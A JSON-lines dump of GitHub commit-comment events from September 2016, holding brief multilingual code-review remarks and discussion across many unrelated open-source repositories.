{"id":"4511631942","type":"CommitCommentEvent","actor":{"login":"Wulf"},"repo":{"name":"Thomas101/nodehun"},"payload":{"comment":{"id":18888824,"position":null,"line":null,"path":null,"commit_id":"48d2f2b0bfb33c23285317f3ef64c0d05f95fc72","created_at":"2016-09-03T05:06:15Z","updated_at":"2016-09-03T05:06:15Z","body":"I found the PR button, will it make a difference whether I request the pull?"}},"created_at":"2016-09-03T05:06:15Z"}
{"id":"4511632274","type":"CommitCommentEvent","actor":{"login":"FernetMenta"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18888826,"position":43,"line":452,"path":"xbmc/video/dialogs/GUIDialogVideoSettings.cpp","commit_id":"72cc33cfaa6af54c8bd0c15481fa8b172870e3c3","created_at":"2016-09-03T05:06:35Z","updated_at":"2016-09-03T05:06:35Z","body":"- no vertical alignment\r\n- only one statement per line"}},"created_at":"2016-09-03T05:06:35Z"}
{"id":"4511633015","type":"CommitCommentEvent","actor":{"login":"jonyTF"},"repo":{"name":"baldengineers/mapper"},"payload":{"comment":{"id":18888827,"position":null,"line":null,"path":null,"commit_id":"605adb3aff9d54905c541db88c427cb3abc3ba7b","created_at":"2016-09-03T05:07:21Z","updated_at":"2016-09-03T05:07:21Z","body":"yup\n\nOn Fri, Sep 2, 2016 at 9:44 AM, toads_tf <notifications@github.com> wrote:\n\n> great commit\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/baldengineers/mapper/commit/605adb3aff9d54905c541db88c427cb3abc3ba7b#commitcomment-18883212>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQCLCSfRrm8oTFfBAD0Gw1LCQI_I0B71ks5qmFKHgaJpZM4Jz41P>\n> .\n>\n"}},"created_at":"2016-09-03T05:07:21Z"}
{"id":"4511633285","type":"CommitCommentEvent","actor":{"login":"erikkemperman"},"repo":{"name":"erikkemperman/vinyl-prepare"},"payload":{"comment":{"id":18888828,"position":30,"line":34,"path":"index.js","commit_id":"e19492906f1d0de40412cefb6cd4589720d06ecf","created_at":"2016-09-03T05:07:39Z","updated_at":"2016-09-03T05:07:39Z","body":"Actually I'm not sure it is entirely accurate to say glob-stream only deals with paths, see my response here: https://github.com/gulpjs/vinyl-fs/issues/205#issuecomment-244526732\r\n\r\nBy the way, I was looking at node-glob a little more closely and am thinking that it could have an `fs` option to allow things like virtual filesystem to still use its main globbing logic.\r\n\r\nThere was already an issue for it, curious what the maintainer thinks about it.\r\n\r\nAlso there seem to be ways to get and re-use the results of node-glob stat calls, it looks like currently some duplicate calls are done in vinyl-fs (vinyl-prepare in my branch) that might be avoided.\r\n\r\n"}},"created_at":"2016-09-03T05:07:39Z"}
{"id":"4511638311","type":"CommitCommentEvent","actor":{"login":"ak72ti"},"repo":{"name":"animusdev/vgstation13"},"payload":{"comment":{"id":18888834,"position":null,"line":null,"path":null,"commit_id":"4e20564aa330e140c56e6472c12b2e60ef7ed9f4","created_at":"2016-09-03T05:13:01Z","updated_at":"2016-09-03T05:13:01Z","body":"Тут только Human_Races, где основная, часть, архива, а?"}},"created_at":"2016-09-03T05:13:01Z"}
{"id":"4511638575","type":"CommitCommentEvent","actor":{"login":"BrandonIRS95"},"repo":{"name":"BrandonIRS95/AlasFlightAcademy"},"payload":{"comment":{"id":18888836,"position":null,"line":null,"path":null,"commit_id":"b590a7d382eb516aadd4ffd87ad4a7abafd7f050","created_at":"2016-09-03T05:13:18Z","updated_at":"2016-09-03T05:13:18Z","body":"El metodo de login y registrarse ya no sirve, ahora si quieren probar si esta establecida la conexion con la base de datos envien un comentario en la pagina Contact"}},"created_at":"2016-09-03T05:13:18Z"}
{"id":"4511638596","type":"CommitCommentEvent","actor":{"login":"brian0305"},"repo":{"name":"LeagueSharp-Devs/LeagueSharp.SDKEx"},"payload":{"comment":{"id":18888837,"position":null,"line":null,"path":null,"commit_id":"c3d2c560fcaa87cc08f9f96c698c7746707404e1","created_at":"2016-09-03T05:13:20Z","updated_at":"2016-09-03T05:13:20Z","body":"i use 285 and it work fine :) no need smaller number or higher"}},"created_at":"2016-09-03T05:13:20Z"}
{"id":"4511638611","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18888838,"position":null,"line":null,"path":null,"commit_id":"40c0fc6b958c961c961c8bad77bc0a5abc7468bd","created_at":"2016-09-03T05:13:20Z","updated_at":"2016-09-03T05:13:20Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/40c0fc6b958c961c961c8bad77bc0a5abc7468bd#commitcomment-18888716) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/1a53dc0015fb29269c12a671ce663408634be259/daily_2016_9_3/report.md). cc @jrevels"}},"created_at":"2016-09-03T05:13:20Z"}
{"id":"4511640608","type":"CommitCommentEvent","actor":{"login":"Wulf"},"repo":{"name":"Thomas101/nodehun"},"payload":{"comment":{"id":18888840,"position":null,"line":null,"path":null,"commit_id":"48d2f2b0bfb33c23285317f3ef64c0d05f95fc72","created_at":"2016-09-03T05:15:34Z","updated_at":"2016-09-03T05:15:34Z","body":"Going to do it myself (TravisCI and AppVeyor is failing to build because of this very issue)"}},"created_at":"2016-09-03T05:15:34Z"}
{"id":"4511640905","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18888841,"position":81,"line":130,"path":"day_7.html","commit_id":"42282439d27d6fe0a33e7c603d0f1e65d64325d7","created_at":"2016-09-03T05:15:51Z","updated_at":"2016-09-03T05:15:51Z","body":"不要使用这种方式，使用构造函数去判断，不懂什么是构成函数自己去查"}},"created_at":"2016-09-03T05:15:51Z"}
{"id":"4511641007","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18888843,"position":90,"line":139,"path":"day_7.html","commit_id":"42282439d27d6fe0a33e7c603d0f1e65d64325d7","created_at":"2016-09-03T05:15:58Z","updated_at":"2016-09-03T05:15:58Z","body":"同上"}},"created_at":"2016-09-03T05:15:58Z"}
{"id":"4511641117","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18888844,"position":99,"line":148,"path":"day_7.html","commit_id":"42282439d27d6fe0a33e7c603d0f1e65d64325d7","created_at":"2016-09-03T05:16:05Z","updated_at":"2016-09-03T05:16:05Z","body":"同上"}},"created_at":"2016-09-03T05:16:05Z"}
{"id":"4511641354","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18888845,"position":118,"line":167,"path":"day_7.html","commit_id":"42282439d27d6fe0a33e7c603d0f1e65d64325d7","created_at":"2016-09-03T05:16:20Z","updated_at":"2016-09-03T05:16:20Z","body":"同上"}},"created_at":"2016-09-03T05:16:20Z"}
{"id":"4511641548","type":"CommitCommentEvent","actor":{"login":"budimanjojo"},"repo":{"name":"budimanjojo/packages-community"},"payload":{"comment":{"id":18888846,"position":null,"line":null,"path":null,"commit_id":"bd9e7578175707b2dd6df75569079ab05dfc754f","created_at":"2016-09-03T05:16:33Z","updated_at":"2016-09-03T05:16:33Z","body":"Hi, @oberon2007 I think you forgot to include the fix-abi.patch in here?"}},"created_at":"2016-09-03T05:16:33Z"}
{"id":"4511642540","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18888848,"position":150,"line":199,"path":"day_7.html","commit_id":"42282439d27d6fe0a33e7c603d0f1e65d64325d7","created_at":"2016-09-03T05:17:42Z","updated_at":"2016-09-03T05:17:42Z","body":"显示不重要，需要把这个r返回出去，这样这个函数才有用"}},"created_at":"2016-09-03T05:17:42Z"}
{"id":"4511643030","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18888850,"position":154,"line":203,"path":"day_7.html","commit_id":"42282439d27d6fe0a33e7c603d0f1e65d64325d7","created_at":"2016-09-03T05:18:18Z","updated_at":"2016-09-03T05:18:18Z","body":"你返回1或者0有什么意义吗？这个函数的作用是去重而不是判断是不是数组"}},"created_at":"2016-09-03T05:18:18Z"}
{"id":"4511644663","type":"CommitCommentEvent","actor":{"login":"zxyuling"},"repo":{"name":"lzq129/test"},"payload":{"comment":{"id":18888853,"position":null,"line":null,"path":null,"commit_id":"42282439d27d6fe0a33e7c603d0f1e65d64325d7","created_at":"2016-09-03T05:20:04Z","updated_at":"2016-09-03T05:20:04Z","body":"最后，我让你用test函数去测试你的工具集能否正确工作的代码呢？要是你测试了就会知道，你的判断类型的几个函数是错误的，typeof {}和typeof []都会返回object，但是一个是数组一个是对象"}},"created_at":"2016-09-03T05:20:04Z"}
{"id":"4511645551","type":"CommitCommentEvent","actor":{"login":"darren1231"},"repo":{"name":"darren1231/Adaptive-Huristic-Critic-"},"payload":{"comment":{"id":18888854,"position":null,"line":null,"path":null,"commit_id":"6e021e35e820877a2a71f2b08f1a9f6cffe13085","created_at":"2016-09-03T05:20:57Z","updated_at":"2016-09-03T05:20:57Z","body":"123"}},"created_at":"2016-09-03T05:20:57Z"}
{"id":"4511645719","type":"CommitCommentEvent","actor":{"login":"prathamesh-12"},"repo":{"name":"prathamesh-12/requirejs-test"},"payload":{"comment":{"id":18888855,"position":null,"line":null,"path":null,"commit_id":"3d7a85f4a95396771fe3b49edd5935b0c7a85576","created_at":"2016-09-03T05:21:08Z","updated_at":"2016-09-03T05:21:08Z","body":"committed the latest changes"}},"created_at":"2016-09-03T05:21:08Z"}
{"id":"4511647261","type":"CommitCommentEvent","actor":{"login":"gmfricke"},"repo":{"name":"BCLab-UNM/Swarmathon-ROS"},"payload":{"comment":{"id":18888857,"position":null,"line":null,"path":null,"commit_id":"f5b8b55608aea5bcebef9d95040a77d8f7e41e37","created_at":"2016-09-03T05:22:54Z","updated_at":"2016-09-03T05:22:54Z","body":"superceded"}},"created_at":"2016-09-03T05:22:54Z"}
{"id":"4511649650","type":"CommitCommentEvent","actor":{"login":"thierryvolpiatto"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18888868,"position":null,"line":null,"path":null,"commit_id":"f2768d92ee712ec065d22423798dbbd8137f36cd","created_at":"2016-09-03T05:25:24Z","updated_at":"2016-09-03T05:25:24Z","body":"\nTianxiang Xiong <notifications@github.com> writes:\n\n> Suggestion\n>\n> When making a change to the public interface (in this case, removing\n> helm-force-updating-p), update the major version number.\n\nInteresting, we could indeed switch to these rules.\n\nBut in this example, helm-force-updating-p rename to\nhelm--force-updating-p should not be considered like a change in the\npublic API as this flag (I hope!) is used only internally by helm and\nshould not affect users. \n\n--\nThierry\n"}},"created_at":"2016-09-03T05:25:24Z"}
{"id":"4511654022","type":"CommitCommentEvent","actor":{"login":"phated"},"repo":{"name":"erikkemperman/vinyl-prepare"},"payload":{"comment":{"id":18888880,"position":30,"line":34,"path":"index.js","commit_id":"e19492906f1d0de40412cefb6cd4589720d06ecf","created_at":"2016-09-03T05:29:57Z","updated_at":"2016-09-03T05:29:57Z","body":"It only stats directories (saw something in options) and it also recommends not reusing them from the cache due to race conditions. "}},"created_at":"2016-09-03T05:29:57Z"}
{"id":"4511654245","type":"CommitCommentEvent","actor":{"login":"Noisyfox"},"repo":{"name":"wongsyrone/shadowsocks-windows"},"payload":{"comment":{"id":18888881,"position":195,"line":248,"path":"shadowsocks-csharp/Encryption/IVEncryptor.cs","commit_id":"e6e9fc85883d3ab7734a2412dbc052d97d3852e7","created_at":"2016-09-03T05:30:08Z","updated_at":"2016-09-03T05:30:08Z","body":"这个outlength会被覆盖掉的"}},"created_at":"2016-09-03T05:30:08Z"}
{"id":"4511655072","type":"CommitCommentEvent","actor":{"login":"xiongtx"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18888883,"position":null,"line":null,"path":null,"commit_id":"f2768d92ee712ec065d22423798dbbd8137f36cd","created_at":"2016-09-03T05:30:44Z","updated_at":"2016-09-03T05:30:44Z","body":"I have [a need to use `helm-preselect` directly](https://github.com/clojure-emacs/helm-cider/blob/master/helm-cider.el#L383) in order to specify a source, and I need to set `helm--force-updating-p` to do so. `helm-force-update` only allows a candidate, not the source, to be specified."}},"created_at":"2016-09-03T05:30:44Z"}
{"id":"4511655721","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18888884,"position":null,"line":null,"path":null,"commit_id":"5d56fff5dc5d263d00a238ff3967336b4b885d96","created_at":"2016-09-03T05:31:26Z","updated_at":"2016-09-03T05:31:26Z","body":"Thanks for proof reading this stuff."}},"created_at":"2016-09-03T05:31:26Z"}
{"id":"4511655887","type":"CommitCommentEvent","actor":{"login":"navyad"},"repo":{"name":"gunthercox/ChatterBot"},"payload":{"comment":{"id":18888885,"position":null,"line":null,"path":null,"commit_id":"30c2eec2e68b8ae4426771194cf8789adcd3d5e9","created_at":"2016-09-03T05:31:39Z","updated_at":"2016-09-03T05:31:39Z","body":"@gunthercox If i'm thinking correctly, The Filter class will act as a base class for filter implementations and methods in this class has to be implemented in subclasses.\r\n\r\nBut we should not be able to instantiate **Filter** itself like\r\n```\r\nbase_filter = Filter()\r\nbase_filter.filter_selections()\r\n```\r\n\r\nLet me know if i'm hitting right spot.\r\n"}},"created_at":"2016-09-03T05:31:39Z"}
{"id":"4511658132","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18888886,"position":null,"line":null,"path":null,"commit_id":"efaab1c2f0040b0363ccd8ee76ce4f6253a46e99","created_at":"2016-09-03T05:33:57Z","updated_at":"2016-09-03T05:33:57Z","body":"@ninaholic, thanks for proof reading this stuff."}},"created_at":"2016-09-03T05:33:57Z"}
{"id":"4511659025","type":"CommitCommentEvent","actor":{"login":"maniac103"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18888887,"position":8,"line":0,"path":"app/src/main/java/com/ruesga/rview/ChangeDetailsActivity.java","commit_id":"1417d96916c3bb67e73ab3a197533030eb266659","created_at":"2016-09-03T05:34:53Z","updated_at":"2016-09-03T05:34:53Z","body":"Debug stuff?"}},"created_at":"2016-09-03T05:34:53Z"}
{"id":"4511659224","type":"CommitCommentEvent","actor":{"login":"manp3104"},"repo":{"name":"manp3104/c-classes"},"payload":{"comment":{"id":18888889,"position":25,"line":25,"path":"16.cpp","commit_id":"187bbaacc001e051c0678802d760795b91a9304e","created_at":"2016-09-03T05:35:08Z","updated_at":"2016-09-03T05:35:08Z","body":"adding some more inputs"}},"created_at":"2016-09-03T05:35:08Z"}
{"id":"4511659773","type":"CommitCommentEvent","actor":{"login":"fauxparse"},"repo":{"name":"fauxparse/nzif"},"payload":{"comment":{"id":18888890,"position":null,"line":null,"path":null,"commit_id":"fdb82bccdda1cff9e6b9501a99618e89bf4cb472","created_at":"2016-09-03T05:35:41Z","updated_at":"2016-09-03T05:35:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XMq6681h&#x2F;29-add-5-onto-each-paypal-transaction\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add $5 onto each PayPal transaction</a>"}},"created_at":"2016-09-03T05:35:41Z"}
{"id":"4511661814","type":"CommitCommentEvent","actor":{"login":"yakovru"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18888895,"position":null,"line":null,"path":null,"commit_id":"6d70ce1ba60793e392b76da6e5c04bd4a712531e","created_at":"2016-09-03T05:37:36Z","updated_at":"2016-09-03T05:37:36Z","body":"Ok, but in stable version Unknown_words must set off by default because it duplicates the existing rule MORFOLOGIK_SPELLER_RULE and it underline blue line spelling mistakes."}},"created_at":"2016-09-03T05:37:36Z"}
{"id":"4511665246","type":"CommitCommentEvent","actor":{"login":"dagar"},"repo":{"name":"mavlink/mavlink"},"payload":{"comment":{"id":18888908,"position":null,"line":null,"path":null,"commit_id":"8201e5fa8d7e9389720499630601ba8e4468204d","created_at":"2016-09-03T05:41:11Z","updated_at":"2016-09-03T05:41:11Z","body":"It's shared by PX4 and Ardupilot."}},"created_at":"2016-09-03T05:41:11Z"}
{"id":"4511669688","type":"CommitCommentEvent","actor":{"login":"yakovru"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18888913,"position":null,"line":null,"path":null,"commit_id":"6d70ce1ba60793e392b76da6e5c04bd4a712531e","created_at":"2016-09-03T05:45:58Z","updated_at":"2016-09-03T05:45:58Z","body":"I add postag for \"себя\"."}},"created_at":"2016-09-03T05:45:58Z"}
{"id":"4511670370","type":"CommitCommentEvent","actor":{"login":"imrehg"},"repo":{"name":"resin-io-playground/resin-bbgw-bluetooth"},"payload":{"comment":{"id":18888914,"position":8,"line":8,"path":"start.sh","commit_id":"680738b121a235a395541d83c739f14d69fec6b4","created_at":"2016-09-03T05:46:41Z","updated_at":"2016-09-03T05:46:41Z","body":"@alanhortz \r\nIn the current host OS firmware files are in `/lib/firmware/ti-connectivity`, and in the host OS those are also symlinked to the `/lib/firmware/` as well (in the case of `TIInit_7.2.31.bts`), that's why I added this line, to have the same behaviour. It's likely not needed, but for consistency.\r\n\r\n```\r\nbash-4.3# ls -l /lib/firmware/TI*\r\nlrwxrwxrwx    1 root     root            34 Sep  2 17:16 /lib/firmware/TIInit_11.8.32.bts -> ti-connectivity/TIInit_11.8.32.bts\r\nlrwxrwxrwx    1 root     root            33 Aug  8 12:58 /lib/firmware/TIInit_7.2.31.bts -> ti-connectivity/TIInit_7.2.31.bts\r\n```\r\n\r\nThe command you mention would try to create a symlink at `/lib/firmware/TIInit_11.8.32.bts` pointing to `/lib/firmware/firmware/TIInit_11.8.32.bts`, which does not exists. It's a relative symlink, and it's relative to the symlink file itself (ie. points to a file in the `ti-connectivity` folder within the folder of the symlink itself). Could use absolute symlinks too, but the current one for the other driver is using relative, and just duplicated that here.\r\n\r\nBased on this, I guess you meant symlinking to the application directory?\r\n\r\n```\r\nln -s /usr/src/app/firmware/TIInit_11.8.32.bts /lib/firmware/TIInit_11.8.32.bts\r\n```\r\nYes, that would work for the life of your application, and also would remove the need to `cp` the files in the first place, but would result in broken symlink once you change the application to something else. This copy-and-symlink all in `/lib/firmware` is a more self-contained solution, so it's a matter of taste."}},"created_at":"2016-09-03T05:46:41Z"}
{"id":"4511673845","type":"CommitCommentEvent","actor":{"login":"samdolan"},"repo":{"name":"elimisteve/cryptag"},"payload":{"comment":{"id":18888919,"position":null,"line":null,"path":null,"commit_id":"8e4fa7e970b59ec6b0cce77e81dba724e9f09a87","created_at":"2016-09-03T05:50:16Z","updated_at":"2016-09-03T05:50:16Z","body":"@elimisteve may consider BackendTypeDropboxRemote since it's exported, so it's clearer outside the package out of context."}},"created_at":"2016-09-03T05:50:16Z"}
{"id":"4511674518","type":"CommitCommentEvent","actor":{"login":"shhridoy"},"repo":{"name":"shhridoy/Uri-Solutions"},"payload":{"comment":{"id":18888920,"position":null,"line":null,"path":null,"commit_id":"335b2c36c1d6116e9c6f4e4264b039a35d7b3127","created_at":"2016-09-03T05:50:54Z","updated_at":"2016-09-03T05:50:54Z","body":"My solution"}},"created_at":"2016-09-03T05:50:54Z"}
{"id":"4511678397","type":"CommitCommentEvent","actor":{"login":"logotronic"},"repo":{"name":"logotronic/hello-world"},"payload":{"comment":{"id":18888926,"position":null,"line":null,"path":null,"commit_id":"8c4b201794e84e9bd6fb938763d2ef1120b9ba63","created_at":"2016-09-03T05:55:13Z","updated_at":"2016-09-03T05:55:13Z","body":"#hello-world\r\n\r\nRecently attended the Tech Academy in Portland, OR and on my way learning Java and Python\r\n"}},"created_at":"2016-09-03T05:55:13Z"}
{"id":"4511679128","type":"CommitCommentEvent","actor":{"login":"ruslansennov"},"repo":{"name":"gwtproject/gwt"},"payload":{"comment":{"id":18888927,"position":10,"line":164,"path":"user/super/com/google/gwt/emul/java/lang/String.java","commit_id":"468036ade51cd5094403ed2fb206e204c4f08fd3","created_at":"2016-09-03T05:56:01Z","updated_at":"2016-09-03T05:56:01Z","body":"Hi @rluble \r\nHere I got this error message:\r\n```\r\nCompile with -strict or with -logLevel set to TRACE or DEBUG to see all errors.\r\n         Unification traversed 23169 fields and methods and 2035 types. 2023 are considered part of the current module and 2023 had all of their fields and methods traversed.\r\n         Errors in com/google/gwt/emul/java/lang/String.java\r\n            [ERROR] Line 165: 'String.NativeFunction String.getFromCharCodeFunction()' has invalid name 'String.fromCharCode'.\r\n```\r\nI'm using 2.8.0-SNAPSHOT-20160902"}},"created_at":"2016-09-03T05:56:01Z"}
{"id":"4511683305","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18888930,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-03T06:00:13Z","updated_at":"2016-09-03T06:00:13Z","body":"Okay, seems to be good, only some indicators are flying around, shall I do the transition from cabin to cockpit or do you want?"}},"created_at":"2016-09-03T06:00:13Z"}
{"id":"4511686180","type":"CommitCommentEvent","actor":{"login":"TheFakeMateo"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":18888978,"position":null,"line":null,"path":null,"commit_id":"07764c6811909b5b6a60c190d0f367ce4ac8ef52","created_at":"2016-09-03T06:02:34Z","updated_at":"2016-09-03T06:02:34Z","body":"Not really sure why having \"Smart\" AI turned on in the lab battle is doing this. Could be something I overlooked when adding my own tweaks to Dabomstew's routine or something else. I'll keep my eye on it while continuing to test and tweak Hard Patch specific stuff.\r\n\r\nThat said, I'm planning to do a more thorough overhaul of the AI system in v3.0 anyway, so a quick fix for v2.4 is probably fine in this regard."}},"created_at":"2016-09-03T06:02:34Z"}
{"id":"4511686420","type":"CommitCommentEvent","actor":{"login":"maxteufel"},"repo":{"name":"SuperTux/wiki"},"payload":{"comment":{"id":18888981,"position":54,"line":29,"path":"User-Manual.md","commit_id":"b6b7cfbb4b44b79af7721bae6d60903bcc2b9b5b","created_at":"2016-09-03T06:02:51Z","updated_at":"2016-09-03T06:02:51Z","body":"Can be a collection of islands as well."}},"created_at":"2016-09-03T06:02:51Z"}
{"id":"4511687025","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18888982,"position":11,"line":0,"path":"inc/Export/AdminPage/Page.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:03:32Z","updated_at":"2016-09-03T06:03:32Z","body":"Upper_Case!"}},"created_at":"2016-09-03T06:03:32Z"}
{"id":"4511687267","type":"CommitCommentEvent","actor":{"login":"maxteufel"},"repo":{"name":"SuperTux/wiki"},"payload":{"comment":{"id":18888983,"position":70,"line":49,"path":"User-Manual.md","commit_id":"b6b7cfbb4b44b79af7721bae6d60903bcc2b9b5b","created_at":"2016-09-03T06:03:42Z","updated_at":"2016-09-03T06:03:42Z","body":"This is for v0.5.0, can you mention Forest Island and that it is a development island?"}},"created_at":"2016-09-03T06:03:42Z"}
{"id":"4511687475","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18888985,"position":18,"line":0,"path":"inc/Export/AdminPage/Page.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:03:56Z","updated_at":"2016-09-03T06:03:56Z","body":"Heh Singleton???"}},"created_at":"2016-09-03T06:03:56Z"}
{"id":"4511687789","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18888986,"position":26,"line":0,"path":"inc/Export/AdminPage/Page.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:04:14Z","updated_at":"2016-09-03T06:04:14Z","body":"Where?"}},"created_at":"2016-09-03T06:04:14Z"}
{"id":"4511687881","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18888988,"position":27,"line":0,"path":"inc/Export/AdminPage/Page.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:04:21Z","updated_at":"2016-09-03T06:04:21Z","body":"Where?"}},"created_at":"2016-09-03T06:04:21Z"}
{"id":"4511688795","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18888990,"position":108,"line":0,"path":"inc/Export/AdminPage/Page.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:05:14Z","updated_at":"2016-09-03T06:05:14Z","body":"What about enqueing it?"}},"created_at":"2016-09-03T06:05:14Z"}
{"id":"4511689174","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18888991,"position":154,"line":0,"path":"inc/Export/AdminPage/Page.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:05:36Z","updated_at":"2016-09-03T06:05:36Z","body":"What about enqueing it?"}},"created_at":"2016-09-03T06:05:36Z"}
{"id":"4511689203","type":"CommitCommentEvent","actor":{"login":"hassanmastinoz"},"repo":{"name":"hassanmastinoz/Library"},"payload":{"comment":{"id":18888992,"position":6,"line":97,"path":"app/src/main/res/layout/list_book.xml","commit_id":"cb39d5fae17fbb3a265ef07d5cd6b919513db99d","created_at":"2016-09-03T06:05:38Z","updated_at":"2016-09-03T06:05:38Z","body":"Remove this ( android:visibility=\"invisible\" )"}},"created_at":"2016-09-03T06:05:38Z"}
{"id":"4511689443","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18888994,"position":6,"line":0,"path":"inc/Export/AdminPage/Table.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:05:54Z","updated_at":"2016-09-03T06:05:54Z","body":"Upper_Case"}},"created_at":"2016-09-03T06:05:54Z"}
{"id":"4511689714","type":"CommitCommentEvent","actor":{"login":"cmbant"},"repo":{"name":"cmbant/CAMB"},"payload":{"comment":{"id":18888995,"position":null,"line":null,"path":null,"commit_id":"3018e4b073afb4cd1038e6110417321dbec85d2e","created_at":"2016-09-03T06:06:10Z","updated_at":"2016-09-03T06:06:10Z","body":"Thanks for checking. Check that routine is actually read safe? (I'm just heading on holiday so off for a week, but can look when back).\n\n> On 2 Sep 2016, at 23:56, Alexander Mead <notifications@github.com> wrote:\n> \n> Small update on this. It seems to be the first OMP loop that is causing the problem. The one that surrounds the calls to 'halomod', rather than the one that surrounds the calls to the sigma(R) function, even though it is the sigma(R) function that hangs when the problem occurs. This seems very strange to me.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-03T06:06:10Z"}
{"id":"4511689744","type":"CommitCommentEvent","actor":{"login":"maxteufel"},"repo":{"name":"SuperTux/wiki"},"payload":{"comment":{"id":18888996,"position":143,"line":86,"path":"User-Manual.md","commit_id":"b6b7cfbb4b44b79af7721bae6d60903bcc2b9b5b","created_at":"2016-09-03T06:06:12Z","updated_at":"2016-09-03T06:06:12Z","body":"Is that intended to be in italics, not in bold? Also, even big Tux will die if falling down."}},"created_at":"2016-09-03T06:06:12Z"}
{"id":"4511689868","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18888998,"position":6,"line":0,"path":"inc/Export/AdminPage/Table.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:06:19Z","updated_at":"2016-09-03T06:06:19Z","body":"And filename should be psr-conform"}},"created_at":"2016-09-03T06:06:19Z"}
{"id":"4511691308","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18889003,"position":28,"line":0,"path":"inc/Export/AdminPage/Table.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:07:52Z","updated_at":"2016-09-03T06:07:52Z","body":"Textdomain sp?"}},"created_at":"2016-09-03T06:07:52Z"}
{"id":"4511691543","type":"CommitCommentEvent","actor":{"login":"Super-Baleine"},"repo":{"name":"muonium/core"},"payload":{"comment":{"id":18889004,"position":56,"line":60,"path":"application/controllers/User.php","commit_id":"6a2d2b5940e9fd8c6e8151ac568f03ad39dac6cc","created_at":"2016-09-03T06:08:09Z","updated_at":"2016-09-03T06:08:09Z","body":"arborescence --> tree"}},"created_at":"2016-09-03T06:08:09Z"}
{"id":"4511691704","type":"CommitCommentEvent","actor":{"login":"Chrico"},"repo":{"name":"inpsyde/wpml2mlp"},"payload":{"comment":{"id":18889005,"position":13,"line":0,"path":"wpml2mlp.php","commit_id":"75ea0fe9b4e91327c685ca9ae617475ab9d6bdbb","created_at":"2016-09-03T06:08:19Z","updated_at":"2016-09-03T06:08:19Z","body":"Composer autoloader?"}},"created_at":"2016-09-03T06:08:19Z"}
